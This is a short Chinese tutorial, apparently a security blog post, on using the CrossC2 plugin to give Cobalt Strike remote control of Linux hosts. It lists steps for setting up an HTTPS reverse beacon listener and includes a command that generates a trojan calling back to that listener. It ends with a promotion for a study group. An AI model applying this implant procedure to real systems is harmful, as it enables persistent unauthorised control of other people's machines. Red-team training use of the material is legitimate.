工具使用 | CobaltStrike上线Linux主机(CrossC2)

CobaltStrike上线Linux主机(CrossC2)

写在前面

在红蓝对抗中，我们经常会碰到需要对Linux主机进行长期远控的情况。对于Windows主机，我们可以使用CobaltStrike，那么自然我们会想问，CobaltStrike能否对Linux主机进行长期远控呢？

本文中将讲解如何通过在Linux上执行木马反弹一个CobaltStrike类型的shell，这得依赖于一个CobaltStrike的插件CrossC2。

CrossC2插件项目地址：https://github.com/gloxec/CrossC2

注：CrossC2项目官方声明只支持CobaltStrike3.14版本，本人亲测CobaltStrike4.0也可正常上线，但是无法执行其他操作。

1：首先，访问CrossC2项目地址，下载该项目。

将项目src目录下 genCrossC2.Linux 文件上传到CobaltStrike服务端目录下。

2：将 CobaltStrike 服务端的.cobaltstrike.beacon_keys下载到 CobaltStrike 客户端目录下。

3：由于 Cross C2目前只支持HTTPS Beacon，所以在Listenrs中选择HTTPS进行监听，

服务端开启监听 windows/beacon_https/reverse_https 类型的beacon

4：生成木马

./genCrossC2.Linux 监听的IP 监听的端口 null null Linux x64 test

5：执行木马上线

扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群，内部微信群永久有效！

目前25000+人已关注加入我们